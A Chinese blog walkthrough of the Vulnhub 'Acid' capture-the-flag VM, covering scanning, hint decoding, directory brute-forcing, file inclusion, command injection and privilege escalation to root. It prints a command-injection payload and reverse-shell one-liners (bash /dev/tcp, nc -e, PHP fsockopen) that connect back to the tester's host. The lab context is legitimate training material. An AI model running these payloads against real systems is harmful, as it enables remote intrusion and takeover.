【Vulnhub系列】Acid

已于 2023-06-21 21:31:48 修改
阅读量1.4k 收藏 5
点赞数
分类专栏: 经验心得 VULNHUB靶场题解集合 文章标签: notepad++
于 2018-11-28 13:05:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/84578449
版权

下载连接:https://download.vulnhub.com/acid/Acid.rar

靶机说明

Welcome to the world of Acid.
Fairy tails uses secret keys to open the magical doors.

欢迎来到酸的世界。童话故事需要使用秘密钥匙打开魔法门。

目标

获得root权限和flag。

运行环境

Kali:192.168.56.101

Windows:192.168.56.104

信息收集

先用nmap进行IP探测

nmap -sP -sV -sC -T5 192.168.56.0/24

经过筛选得出目标靶机的IP地址为:192.168.56.103

接下来我i我们用nmap 对目标IP进行端口扫描

nmap -p 1-65535 192.168.56.103

可以看出目标靶机只开放了33447端口

对目标端口进行识别

nmap -p 33447 -sV  192.168.56.103

也可以用过下面这个插件看出靶机的信息

漏洞挖掘的详细思路

  • web挖掘思路:

(1) 查看每个网页的源码,看是否有提示;

(2) 暴破目录,用御剑或DirBuster,看是否有新网页,找新网页的漏洞;

  • Apache挖掘思路:

(1) 寻找Apache2.4.10有无已知漏洞可利用:没有发现可直接利用的漏洞。

(2) 到www.exploit-db.com查询有无exp:没有找到exp。

(3) Nessus扫描一下主机漏洞:没有扫描出漏洞。

那我们从web下手

查看网页源码没有发现什么线索,但是查看网页元素出现了一串16进制编码

0x643239334c6d70775a773d3d

先用ascii码转换,再用base64位转换

直接在访问http://192.168.56.103:33447/wow.jpg

出现404

后来想到这个文件是图片,而且在之前扫描的目录中也出现过images的目录

那么应该访问

http://192.168.100.103:33447/images/wow.jpg

把图片保存到本地,并用notepad++打开在最底下发现了一串数字

把数字之间的冒号都去掉,长度位64猜想可能是经过ASCII编码

利用burp进行ASCII转码

解码出来的值位7aee0f6d588ed9905ee37f16a7c610d4

32位的MD5

7aee0f6d588ed9905ee37f16a7c610d4

去解密下

可能是一个密码或者是一个其他的编号

我们用Dirbuster进行目录的爆破

字典直接选用kali自带的Dirbuster字典

扫描结果如图

分别访问下列举出来的目录

访问cake.php提示要登陆,但是看到页面的title出现Magic_Box

访问include.php发现是一个文件包含

试着包含/etc/passwd

发现是可以的,但是没有上传点,不能上传webshell

再访问下hack.php

发现要添加ID,随手输入个出现提示

试着把我们刚刚解码的那个输入进去看看,也是同样的提示

我们之前不是发现了Magic_Box的目录嘛

我们试着访问下

http://192.168.56.103:33447/Challenge/Magic_Box/

发现是存在的,那么我们继续对这个路径进行扫描

扫描结果如下:

访问command.php发现是一个命令执行

我们测试下127.0.0.1;ls

成功执行,额外还发现一个tail.php

那么我们就用nc反弹shell

先用kali监听端口

尝试bash反弹shell、nc反弹shell(注意需要进行url编码)

如下payload都失败:

bash -i >& /dev/tcp/192.168.56.101/5555 0>&1

nc -e /bin/bash -d 192.168.56.101 5555

目标靶机有php环境,那么我们试下php反弹

127.0.0.1;php -r '$sock=fsockopen("192.168.56.101",5555);exec("/bin/bash -i <&3 >&3 2>&3");'

成功拿到一个shell

然后我们用python模拟出一个终端

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

接下来我们就来提升权限

先 cat /etc/passwd 看看有哪些用户使用/bin/sh

查找每个用户的文件

find / -user 用户名称 2>/dev/null -ls

在用户acid的文件中发现一个奇怪的文件

发现/sbin/raw_vs_isi/hint.pcapng文件,这是一个网络流量抓包文件,将其拷贝的kali上,用Wireshark打开:

cd到/sbin/raw_vs_isi/目录

然后用python开启建议HTTP服务

python -m SimpleHTTPServer 8080

然后在kali上 访问 http://192.168.56.103:8080进行下载

然后用wireshark打开,只看TCP协议的包,发现saman的密码:1337hax0r

su提权到saman、root,获得flag

然后在输入 sudo -i切换到root并得到flag

大方子
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透靶场——Vulnhub:Acid
tlovejr的博客
09-17 293
1、首先还是常规套路,kali攻击机器还有靶机均为net模式,然后扫描主机 2、找到存活靶机ip地址,然后我们继续开始信息收集 nmap -T4 -p- 192.168.40.130 3、访问8080端口没有结果,那么我们继续访问一下33447这个端口试一下 4、成功发现我们要继续做的这个界面,继续信息收集,目录扫描,但是并没有发现有用的信息 5、然后我们继续尝试一下robots.txt 6、发现也没有什么有用的信息,那么我们查看一下源码,看看有没有什么有用的信息 7、在查看源码的时候发现有一个有
数据库的ACID特性术语详解
09-10
主要介绍了数据库的ACID特性术语详解,ACID就是:原子性(Atomicity )、一致性( Consistency )、隔离性( Isolation)和持久性(Durabilily),本文分别解释了它们,需要的朋友可以参考下
ACID_pro4 ACID中文版本
03-09
ACID_pro4 ACID中文版本
Vulnhub靶机-Prime1
最新发布
m0_74855736的博客
03-08 959
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
VulnHub靶场之Acid
A_dmin的博客
09-30 1030
VulnHub靶场之Acid 本来这个实验昨天就应该完成了的,但是在自己电脑上弄得时候直接卡死,,,,
vulnhub-ACID
weixin_50683638的博客
12-09 2215
靶机:acid(https://download.vulnhub.com/acid/Acid.rar)网络模式:nat 扫描主机 扫描端口33447/tcp,Apache2.4.10 ####### 目录扫描 浏览网站,查看源码底下看到一串十六进制编码 先ascii转换,在base64转码得到 wow.jpg 访问wow.jpg报错404想到上面我们扫描目录images 将图片保存,记事本打开,发现一串数字 先ascii转码,在MD5转换得到63425 但暂时并没有什么账号或者需要登陆
VulnhubAcid实战
weixin_43862283的博客
04-29 352
1、发现主机 使用nmap对内网进行扫描,发现主机 nmap -sP 192.168.340/24 2、扫描端口 用nmap扫描目标主机,发现只有33447端口开启,http端口 nmap -sV -p0-65535 192.168.34.151 3、扫描网站目录并进行爆破 dirb http://192.168.34.151:33447 发现Challenge目录,进行目录爆破 访...
Vulnhub靶场渗透练习(四) Acid
weixin_30951231的博客
07-08 369
利用namp 先进行扫描获取ip nmap 192.168.18.* 获取ip 没发现80端口 主机存活 猜测可以是个2000以后的端口 nmap -p1-65533 192.168.18.146 返回 192.168.18.146:33447 开放33447端口 利用御剑和进行burpsuit 爆破 得到 imges ,index ,challenge 等...
分布式-CAP与ACID原则
06-14
分布式-CAP与ACID原则转载整理......
AcidBox_reverseengineering_acid_
10-03
Acid box malware for reverse engineering
ACID7 注册机
06-05
ony ACID Pro 7.0 注册机 ------------------------------ 测试通过2010 .8
靶机实战-Acid
滕财然的博客
01-26 783
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有一个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现一串16进制...
VulnHub打靶の-Acid
壊壊的诱惑你的博客
10-12 1145
靶机地址:https://download.vulnhub.com/acid/Acid.rar 首先nmap -sP 或netdiscover -r来找靶机的IP,此为192.168.1.171 nmap -sV -p- 192.168.1.171扫描靶机的全部端口的服务版本: root@Kali-X86:~# nmap -sV -p- 192.168.1.171 Starting Nmap...
Acid靶机练习
yifujiadeng的博客
05-06 333
Acid靶机练习 网络结构: 环境搭建平台为VMware15,网络为nat模式,网段192.168.1.0/24 网络由攻击机kali、靶机组成 靶机ip:192.168.1.140 kali linux ip:192.168.1.137 信息收集: 主机发现: nmap -sP 192.168.1.0/24 下图中192.168.1.1为VMnet8网卡地址,1.3为网关地址,1.137为攻击机地址,因此推测目标主机地址为192.168.1.140 端口扫描: 可以看到目标机器使用了Apache作为中
靶机渗透实战-Acid
qq_46540840的博客
02-04 3138
文章目录 这几天有点事情,靶机方面就没在更新,后边会积极的更新。 文章目录文章目录信息收集漏洞发现利用提权总结 信息收集 信息收集是必不可少的. 首先用自己的kali当攻击机,下载acid靶机 靶机下载地址 首先进行靶机发现 nmap -sn 192.168.240.1。1/24进行主机发现不尽兴端口扫描(128是kali地址) 然后对主机进行端口扫描 nmap -sV -T4 -A -p- 192.168.240.137 其中sV 扫描版本信息和开放的服务 , -A扫描开放端口的具体服务
Acid靶机渗透
weixin_30567225的博客
08-03 716
Acid渗透靶机实战 攻击机:kali 192.168.41.147 靶机: acid 192.168.41.149 信息收集 ip发现 开启Acid靶机,通过nmap进行局域网存火主机扫描.![](https://img2018.cnblogs.com/blog/1357258/201907/1357258-20190725111009774-877137553.p...
靶机渗透实战1:Acid: Server
anbangsi3839的博客
07-12 263
一、准备说明: 攻击机:WMware 中的 Kali Linux 靶机:VMware 中的Acid: Server(下载地址:https://www.vulnhub.com/entry/acid-server,125/) 目标:Escalate the privileges to root and capture the flag 二、信息收集 2.1 查找靶机 IP 地址:...
Acid靶场实战
m0_65149086的博客
05-04 355
云尘靶场,靶机渗透,Vulhnub,Acid
靶场渗透(二)——Acid渗透
Ramona的博客
08-02 870
测试环境 靶机:Acid 打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描靶机Ip及开放端口 扫描ip:nmap -sP 192.168.111.1/24 扫描端口:nmap -p1-65535 -sV 靶机Ip 获取信息:ip为192.168.111.129 开放端口为33447/tcp 提供服务为web和apache 操作系统为ubun...
mysql acid
09-16
MySQL中的ACID是指数据库事务必须满足的四个特性:原子性(Atomicity)、一致性(Consistency)、隔离性(Isolation)和持久性(Durability)。原子性指事务是不可分割的最小执行单位,要么全部执行成功,要么全部回滚;一致...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值